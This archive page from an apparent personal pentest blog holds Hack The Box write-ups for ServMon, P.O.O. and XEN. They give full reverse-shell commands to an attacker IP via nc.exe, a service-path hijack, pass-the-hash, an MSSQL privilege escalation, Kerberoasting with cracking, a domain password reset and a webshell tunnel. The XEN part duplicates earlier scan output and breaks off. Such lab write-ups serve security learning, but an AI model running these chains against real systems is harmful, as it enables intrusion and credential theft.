Month: April 2020
Protected: htb-magic-nl
Protected: thm-steelmountain-nl
Protected: thm-vulnversity-nl
htb-servmon-nl
htb-servmon
As always we start with a nmap scan
We can ftp anonymous in and find, confidential.txt in ftp://10.10.10.184/Nathan
Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards Nadine
LFI is https://www.exploit-db.com/exploits/47774
so we have the passwords
L1k3B1gBut7s@W0rk is the pasword for user Nadine for service
ssh nadine@10.10.10.184 password with L1k3B1gBut7s@W0rk
next we upload nc.exe to box
then
https://www.exploit-db.com/exploits/46802
C:\Program Files\NSClient++>nscp web — password –display
Current password: ew2x6SsGTxjRwXOT
this password for login page on 8443 port
curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat –data-binary “c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe”
or run:
E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation [*] Requesting shares on 10.10.10.184..... [*] Found writable share ADMIN$ [*] Uploading file TEhcBLUe.exe [*] Opening SVCManager on 10.10.10.184..... [*] Creating service Lofh on 10.10.10.184..... [*] Starting service Lofh..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>cd c:\users\administrator\desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of c:\Users\Administrator\Desktop 08/04/2020 23:12 <DIR> . 08/04/2020 23:12 <DIR> .. 15/04/2020 05:58 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 27,399,426,048 bytes free c:\Users\Administrator\Desktop>type root.txt 62fb102b67c0760ac03f1cf05616dc65
c:\Temp>cqh -samdump SAM hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Nadine:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Nathan:1004:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Other way:
Enumerate the current user and find that the “Server Operators” user group can read and write system services, and can change services with System permissions and start. Here comes the idea: find a system permission service that has not been started, modify the content to Trojan or nc, and then execute:
*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f The operation completed successfully. *Evil-WinRM* PS C:\temp> sc.exe start SensorDataService
C:\Users\jacco>nc -nlvp 9876 listening on [any] 9876 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687 Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>hostname hostname ServMon C:\WINDOWS\system32>
…
Author : Puckiestyle
Protected: htb-forwardslash-private
htb-endgame-poo
Hack the Box – P.O.O ( writeup as of box retired by june 2020 )
As normal I add the IP of the machine 10.13.38.11 to /etc/hosts as poo.htb
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11
E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining) Nmap scan report for humongousretail.com (10.13.38.12) Host is up (0.024s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 25/tcp open smtp | fingerprint-strings: | GenericLines, GetRequest: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | sequence of commands | sequence of commands | Hello: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | EHLO Invalid domain address. | Help: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | NULL: |_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP, |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail 443/tcp open ssl/http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail | ssl-cert: Subject: commonName=humongousretail.com | Subject Alternative Name: DNS:humongousretail.com | Not valid before: 2019-03-31T21:05:35 |_Not valid after: 2039-03-31T21:15:35 |_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\ SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20 SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2 SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|general purpose|phone Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%) OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 8s, deviation: 0s, median: 8s TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 24.00 ms 10.14.14.1 2 24.00 ms humongousretail.com (10.13.38.12) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds
It seems we have discovered a few ports open. I chose not to perform a UDP scan at this point in the exercise. It seems we have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.
I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ
wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ
The interesting ones for me to look at seemed to be the ‘admin’ folder and ‘.DS_Store’ file. Simply because admin indicates an area of privilege and .DS_Store files generally hold information about the folder that it resides in.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.
I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.
Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using https://github.com/lijiejie/ds_store_exp
python ds_store_exp.py http://10.13.38.11/.DS_Store
We have some interesting directories. I run IIS Shortname scanner located at https://github.com/irsdl/IIS-ShortName-Scanner to see if I could come up with anything interesting and one specific directory came up with good information.
java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
I tried a couple of filenames and then hit the jackpot with poo_connection.txt.
This seemed to be details to a SQL database. And we have our first flag.
POO{fcfb0767f5bd3cbc22f40ff5011ad555}
SERVER=10.13.38.11 USERID=external_user DBNAME=POO_PUBLIC USERPWD=#p00Public3xt3rnalUs3r# Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}
SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.
And we have a successful login.
I then proceeded to create a new user puckie for myself.
Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag Select * FROM dbo.flag
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}
Creating an sql user puckie in sql studio
EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG]; EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG]; EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG]; EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG]; EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG]; EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
SHELL Access
I needed to enable xp_cmdshell
Now that I had sysadmin rights on the box, I decided to use https://alamot.github.io/mssql_shell/ to try and gain a shell on the box.
python3 mssql_shell.py from https://github.com/puckiestyle/python/blob/master/mssql_shell.py
I was unable to read anything from the web.config file. I tried to output it but got Access Denied.
After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.
xp_cmdshell whoami EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");'; EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';
Admin Page
Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.
POO{4882bd2ccfd4b5318978540d9843729f}
IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name=”Block network access for R local user accounts in SQL Server instance POO_PUBLIC”
And then I noticed an IPv6 address and another adapter.
I performed an additional scan on the IPv6 address.
kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining) Nmap scan report for dead:babe::1001 Host is up (0.026s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 80/tcp open http 1433/tcp open ms-sql-s 5985/tcp open wsman Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds
I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.
dead:babe::1001 poov6.htb
I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.
ruby winrm_shell_with_upload.rb
Or use Evil-winrm to find the 4th flag
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt POO{ff87c4fe10e2ef096f9a96a01c646f8f}
I wanted to see what I could find out about the domain. Knowing that it is on a domain, I was hoping for some Kerberos tokens that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier..
Kerberoasting
I logged back in through the SQL Shell that I had earlier.
powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
This come back with 2 accounts.
This one was named p00_hr.
This one was named p00_adm.
I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.
Hashcat
I proceeded to run these 2 tokens through hashcat and run them with the best64 rule.
hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule
The p00_hr account came back quickly.
p00_hr:Password123!
However, when I run the p00_adm account through rockyou, it did not return any results. I then decided to run the token through all passwords found in all text files that lay within the SecLists folders.
hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule
And this eventually found a result in the Keyboard-Combinations.txt file.
p00_adm:ZQ!5t4r
Now that I had both these passwords cracked. I needed to try and gain access to the domain controller which was on 172.20.128.53.
Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1
Once I had created all the variables necessary, I then tried to get the user information on the domain.
get-netuser -DomainController dc -Credential $cred
Looking through the list of users on the domain, I noticed one which was interesting.
This was an account names mr3ks
PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1
This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.
UPLOAD /opt/htb/endgame/poo/sdup.ps1 c:\temp\sdup.ps1 Import-Module .\PowerView.ps1 $Username = 'p00_adm' $Password = 'ZQ!5t4r' $pass = ConvertTo-SecureString -AsPlainText $Password -Force $Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred
I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.
reGeorg
I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the root folder
UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx
I then browsed to the tunnel to see if it would activate.
To my surprise, it worked. Now for me to create my tunnel with reGeorge.
python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx
I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.
proxychains ruby winrmdc_shell_with_ipload.rb
This provided me with Direct access to the Domain Controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}
This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type;
dism /online /enable-feature /featurename:NerFx4Extended-ASPNET45 -All
…..extra…
kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11 Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'. [*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 7235) [!] Press help for extra shell commands SQL> help lcd {path} - changes the current local directory to {path} exit - terminates the server process (and this session) enable_xp_cmdshell - you know what it means disable_xp_cmdshell - you know what it means xp_cmdshell {cmd} - executes cmd using xp_cmdshell sp_start_job {cmd} - executes cmd using the sql server agent (blind) ! {cmd} - executes a local shell cmd SQL>
.
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r# password => #p00Public3xt3rnalUs3r# msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run [*] Running module against 10.13.38.11 [*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user... [+] 10.13.38.11:1433 - Connected. [*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY [*] 10.13.38.11:1433 - Domain Name: POO [+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0 [*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient... [*] 10.13.38.11:1433 - - POO\Administrator [*] 10.13.38.11:1433 - - POO\Guest [*] 10.13.38.11:1433 - - POO\krbtgt [*] 10.13.38.11:1433 - - POO\DefaultAccount [*] 10.13.38.11:1433 - - POO\Domain Admins [*] 10.13.38.11:1433 - - POO\Domain Users [*] 10.13.38.11:1433 - - POO\Domain Guests [*] 10.13.38.11:1433 - - POO\Domain Computers [*] 10.13.38.11:1433 - - POO\Domain Controllers [*] 10.13.38.11:1433 - - POO\Cert Publishers [*] 10.13.38.11:1433 - - POO\Schema Admins [*] 10.13.38.11:1433 - - POO\Enterprise Admins [*] 10.13.38.11:1433 - - POO\Group Policy Creator Owners [*] 10.13.38.11:1433 - - POO\Read-only Domain Controllers [*] 10.13.38.11:1433 - - POO\Cloneable Domain Controllers [*] 10.13.38.11:1433 - - POO\Protected Users [*] 10.13.38.11:1433 - - POO\Key Admins [*] 10.13.38.11:1433 - - POO\Enterprise Key Admins [*] 10.13.38.11:1433 - - POO\RAS and IAS Servers [*] 10.13.38.11:1433 - - POO\Allowed RODC Password Replication Group [*] 10.13.38.11:1433 - - POO\Denied RODC Password Replication Group [*] 10.13.38.11:1433 - - POO\mr3ks [*] 10.13.38.11:1433 - - POO\DC$ [*] 10.13.38.11:1433 - - POO\DnsAdmins [*] 10.13.38.11:1433 - - POO\DnsUpdateProxy [*] 10.13.38.11:1433 - - POO\COMPATIBILITY$ [*] 10.13.38.11:1433 - - POO\p00_hr [*] 10.13.38.11:1433 - - POO\p00_dev [*] 10.13.38.11:1433 - - POO\p00_adm [*] 10.13.38.11:1433 - - POO\P00 Help Desk [+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found. [*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt [*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r# password => #p00Public3xt3rnalUs3r# msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11 rhosts => 10.13.38.11 msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user username => external_user msf5 auxiliary(admin/mssql/mssql_enum) > run [*] Running module against 10.13.38.11 [*] 10.13.38.11:1433 - Running MS SQL Server Enumeration... [*] 10.13.38.11:1433 - Version: [*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) [*] Jun 15 2019 00:26:19 [*] Copyright (C) 2017 Microsoft Corporation [*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor) [*] 10.13.38.11:1433 - Configuration Parameters: [*] 10.13.38.11:1433 - C2 Audit Mode is Not Enabled [*] 10.13.38.11:1433 - xp_cmdshell is Enabled [*] 10.13.38.11:1433 - remote access is Enabled [*] 10.13.38.11:1433 - allow updates is Not Enabled [*] 10.13.38.11:1433 - Database Mail XPs is Not Enabled [*] 10.13.38.11:1433 - Ole Automation Procedures are Not Enabled [*] 10.13.38.11:1433 - Databases on the server: [*] 10.13.38.11:1433 - Database name:master [*] 10.13.38.11:1433 - Database Files for master: [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf [*] 10.13.38.11:1433 - Database name:tempdb [*] 10.13.38.11:1433 - Database Files for tempdb: [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf [*] 10.13.38.11:1433 - Database name:POO_PUBLIC [*] 10.13.38.11:1433 - Database Files for POO_PUBLIC: [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf [*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf [*] 10.13.38.11:1433 - System Logins on this Server: [*] 10.13.38.11:1433 - sa [*] 10.13.38.11:1433 - external_user [*] 10.13.38.11:1433 - Disabled Accounts: [*] 10.13.38.11:1433 - No Disabled Logins Found [*] 10.13.38.11:1433 - No Accounts Policy is set for: [*] 10.13.38.11:1433 - All System Accounts have the Windows Account Policy Applied to them. [*] 10.13.38.11:1433 - Password Expiration is not checked for: [*] 10.13.38.11:1433 - sa [*] 10.13.38.11:1433 - external_user [*] 10.13.38.11:1433 - System Admin Logins on this Server: [*] 10.13.38.11:1433 - sa [*] 10.13.38.11:1433 - Windows Logins on this Server: [*] 10.13.38.11:1433 - No Windows logins found! [*] 10.13.38.11:1433 - Windows Groups that can logins on this Server: [*] 10.13.38.11:1433 - No Windows Groups where found with permission to login to system. [*] 10.13.38.11:1433 - Accounts with Username and Password being the same: [*] 10.13.38.11:1433 - No Account with its password being the same as its username was found. [*] 10.13.38.11:1433 - Accounts with empty password: [*] 10.13.38.11:1433 - No Accounts with empty passwords where found. [*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found: [*] 10.13.38.11:1433 - sp_replsetsyncstatus [*] 10.13.38.11:1433 - sp_replcounters [*] 10.13.38.11:1433 - sp_replsendtoqueue [*] 10.13.38.11:1433 - sp_resyncexecutesql [*] 10.13.38.11:1433 - sp_prepexecrpc [*] 10.13.38.11:1433 - sp_repltrans [*] 10.13.38.11:1433 - sp_xml_preparedocument [*] 10.13.38.11:1433 - xp_qv [*] 10.13.38.11:1433 - xp_getnetname [*] 10.13.38.11:1433 - sp_releaseschemalock [*] 10.13.38.11:1433 - sp_refreshview [*] 10.13.38.11:1433 - sp_replcmds [*] 10.13.38.11:1433 - sp_unprepare [*] 10.13.38.11:1433 - sp_resyncprepare [*] 10.13.38.11:1433 - sp_createorphan [*] 10.13.38.11:1433 - xp_dirtree [*] 10.13.38.11:1433 - sp_replwritetovarbin [*] 10.13.38.11:1433 - sp_replsetoriginator [*] 10.13.38.11:1433 - sp_xml_removedocument [*] 10.13.38.11:1433 - sp_repldone [*] 10.13.38.11:1433 - sp_reset_connection [*] 10.13.38.11:1433 - xp_fileexist [*] 10.13.38.11:1433 - xp_fixeddrives [*] 10.13.38.11:1433 - sp_getschemalock [*] 10.13.38.11:1433 - sp_prepexec [*] 10.13.38.11:1433 - xp_revokelogin [*] 10.13.38.11:1433 - sp_execute_external_script [*] 10.13.38.11:1433 - sp_resyncuniquetable [*] 10.13.38.11:1433 - sp_replflush [*] 10.13.38.11:1433 - sp_resyncexecute [*] 10.13.38.11:1433 - xp_grantlogin [*] 10.13.38.11:1433 - sp_droporphans [*] 10.13.38.11:1433 - xp_regread [*] 10.13.38.11:1433 - sp_getbindtoken [*] 10.13.38.11:1433 - sp_replincrementlsn [*] 10.13.38.11:1433 - Instances found on this server: [*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of: [*] 10.13.38.11:1433 - xp_regread might be disabled in this system [*] Auxiliary module execution completed msf5 auxiliary(admin/mssql/mssql_enum) >
Author – Puckiestyle
htb-endgame-xen
Hack the Box – XEN ( retired june 2020 )
1st I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb
NMAP
As always we start with a nmap scan
E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12 Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining) Nmap scan report for humongousretail.com (10.13.38.12) Host is up (0.024s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 25/tcp open smtp | fingerprint-strings: | GenericLines, GetRequest: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | sequence of commands | sequence of commands | Hello: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | EHLO Invalid domain address. | Help: | 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY | NULL: |_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL) | smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP, |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail 443/tcp open ssl/http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Humongous Retail | ssl-cert: Subject: commonName=humongousretail.com | Subject Alternative Name: DNS:humongousretail.com | Not valid before: 2019-03-31T21:05:35 |_Not valid after: 2039-03-31T21:15:35 |_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 |_ SSL2_DES_192_EDE3_CBC_WITH_MD5 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\ SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20 SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2 SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n"); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: specialized|general purpose|phone Running (JUST 